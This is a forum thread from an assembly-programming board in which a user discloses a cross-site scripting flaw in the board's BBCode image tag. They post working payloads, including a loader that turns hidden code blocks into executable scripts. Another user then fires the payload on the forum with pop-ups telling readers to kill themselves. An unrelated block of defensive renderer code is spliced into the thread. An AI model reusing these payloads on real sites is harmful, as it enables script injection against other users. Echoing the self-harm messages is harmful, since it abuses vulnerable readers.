ASM to Sega Genesis Platform


All about assembly programming in the Sega Genesis console.


2 posters

    Cross Site Scripting (XSS) with BBCode

    Ralakimus1

    Posts : 468
    Join date : 2021-06-29
    Location : Moved on.

    Cross Site Scripting (XSS) with BBCode

    Post  Ralakimus1 Fri Aug 13, 2021 11:02 pm

    So, IMG tags in BBCode fail to sanitize " and ' from the URL you insert into it. You can use this to insert additional attributes into the HTML IMG tag that it generates, which can then be used to execute Javascript code. I found it to work with the "onanimationstart" tag, since that doesn't get filtered out by the forums.

    Code:
    <style>@keyframes x{}</style>
    [img]&#34;onanimationstart=&#34;javascript:[INSERT CODE HERE]&#34; style="animation: x;&#34;[/img]

    Here, I create a blank animation in CSS called "x", and then set the onanimationstart attribute in the IMG tag, and also the style attribute that sets the animation to "x".

    It is important that quotes are stored as HTML character codes, single and double (&#39; and &#34;, respectively), or else it will not work.

    pls be safe with this
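
Added example, not part of the original thread and not the forum software's own code: a minimal model of the flaw described in the first post (an [img] renderer that places the URL inside the src attribute with its quotes intact) next to a hardened renderer. The function names and sample inputs are constructed, and the naive renderer is an assumption about how such a tag gets built.

```javascript
// Added example; function names are hypothetical, inputs are constructed.

// Decode numeric character references (&#34;, &#39;, ...) so validation
// sees the same characters the browser eventually will.
function decodeNumericEntities(s) {
  return s.replace(/&#(\d+);/g, (_, n) => String.fromCodePoint(Number(n)));
}

// Escape every character that can end or reshape a quoted attribute value.
function escapeAttr(s) {
  return s.replace(/[&<>"'`]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// Assumed model of the flaw: the URL lands inside src="..." with its
// quotes intact, so the value can close the attribute and add new ones.
function renderImgNaive(body) {
  return `<img src="${decodeNumericEntities(body)}">`;
}

// Hardened: decode once, require an absolute http(s) URL, then emit the
// parser-normalised URL through the attribute escaper.
function renderImgHardened(body) {
  let url;
  try {
    url = new URL(decodeNumericEntities(body).trim());
  } catch {
    return null; // not an absolute URL (or bad entity): render nothing
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") return null;
  return `<img src="${escapeAttr(url.href)}" alt="">`;
}

// List the attribute names an HTML parser would see in a generated tag.
function attributeNames(tag) {
  const re = /([^\s"'<>\/=]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]*)/g;
  return [...tag.matchAll(re)].map((m) => m[1].toLowerCase());
}

// Constructed input in the shape the post describes, placeholder body kept.
const sample =
  "&#34;onanimationstart=&#34;[INSERT CODE HERE]&#34; style=&#34;animation: x;&#34;";

console.log(attributeNames(renderImgNaive(sample))); // extra attributes appear
console.log(renderImgHardened(sample));              // rejected: not a URL
console.log(renderImgHardened("https://example.com/a.png?x=1&#34; y=&#34;1"));
```

The hardened path depends on two independent checks: the scheme allowlist rejects anything that is not an http(s) URL, and the attribute escaper ensures that whatever survives can never close the src value.
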
    Ralakimus1

    Posts : 468
    Join date : 2021-06-29
    Location : Moved on.

    Re: Cross Site Scripting (XSS) with BBCode

    Post  Ralakimus1 Fri Aug 13, 2021 11:04 pm

    Forgot to change a " in the code box to a &#34;

    Code:
    <style>@keyframes x{}</style>
    [img]&#34;onanimationstart=&#34;javascript:[INSERT CODE HERE]&#34; style=&#34;animation: x;&#34;[/img]
    Ralakimus1

    Posts : 468
    Join date : 2021-06-29
    Location : Moved on.

    Re: Cross Site Scripting (XSS) with BBCode

    Post  Ralakimus1 Fri Aug 13, 2021 11:06 pm


    Ralakimus1

    Posts : 468
    Join date : 2021-06-29
    Location : Moved on.

    Re: Cross Site Scripting (XSS) with BBCode

    Post  Ralakimus1 Sat Aug 14, 2021 1:24 am


    Jdpense

    Posts : 100564
    Join date : 2014-08-21

    Re: Cross Site Scripting (XSS) with BBCode

    Post  Jdpense Sat Aug 14, 2021 10:01 am

    Neato

    Smile
    Ralakimus1

    Posts : 468
    Join date : 2021-06-29
    Location : Moved on.

    Re: Cross Site Scripting (XSS) with BBCode

    Post  Ralakimus1 Sat Aug 14, 2021 1:23 pm




    Created a script that clones "code" tags (with their class defined as "xss") as proper executable script tags.

    Just insert this in your page:
    Code:
    [img]&#34;onanimationstart=&#34;javascript:for&#40;let s of document.getElementsByClassName&#40;&#39;xss&#39;&#41;&#41;&#123; if&#40;s.nodeName==&#39;CODE&#39;&#41; &#123; var c=document.createElement&#40;&#39;script&#39;&#41;; c.type=&#39;text&#47;javascript&#39;; c.text=s.innerText; document.body.appendChild&#40;c&#41;; &#125;&#125;&#34; style=&#34;animation:xssanim;height:0;&#34;[/img]
    <style>@keyframes xssanim{} code.xss{display:none;height:0;}</style>

    And, now you can do stuff like this:
    Code:
    <code class="xss">
    alert("Easier XSS! Woo!");
    </code>


    Ralakimus1

    Posts : 468
    Join date : 2021-06-29
    Location : Moved on.

    Re: Cross Site Scripting (XSS) with BBCode

    Post  Ralakimus1 Sat Aug 14, 2021 1:26 pm

    This method is also far more reliable, since now whatever JS code is made no longer has to be in the IMG tag, which I found has the potential to mess with it, depending on what the code contains.
    Jdpense

    Posts : 100564
    Join date : 2014-08-21

    Re: Cross Site Scripting (XSS) with BBCode

    Post  Jdpense Mon Jan 10, 2022 9:38 am

    BUMP!!!!!!

    If only there was a way to remove flood control completely using this trick
    Jdpense

    Posts : 100564
    Join date : 2014-08-21

    Re: Cross Site Scripting (XSS) with BBCode

    Post  Jdpense Mon Jan 10, 2022 9:42 am

    Cross Site Scripting (XSS) with BBCode &#34;onanimationstart=&#34;javascript:for&#40;let s of document.getElementsByClassName&#40;&#39;xss&#39;&#41;&#41;&#123; if&#40;s.nodeName==&#39;CODE&#39;&#41; &#123; var c=document.createElement&#40;&#39;script&#39;&#41;; c.type=&#39;text&#47;javascript&#39;; c.text=s.innerText; document.body


    alert("Your life is NOTHING!");

    What a Face
    Jdpense

    Posts : 100564
    Join date : 2014-08-21

    Re: Cross Site Scripting (XSS) with BBCode

    Post  Jdpense Mon Jan 10, 2022 9:43 am

    Cross Site Scripting (XSS) with BBCode &#34;onanimationstart=&#34;javascript:for&#40;let s of document.getElementsByClassName&#40;&#39;xss&#39;&#41;&#41;&#123; if&#40;s.nodeName==&#39;CODE&#39;&#41; &#123; var c=document.createElement&#40;&#39;script&#39;&#41;; c.type=&#39;text&#47;javascript&#39;; c.text=s.innerText; document.body


    alert("Your life you have ZERO purpose!");
    alert("You should kill yourself NOW!");

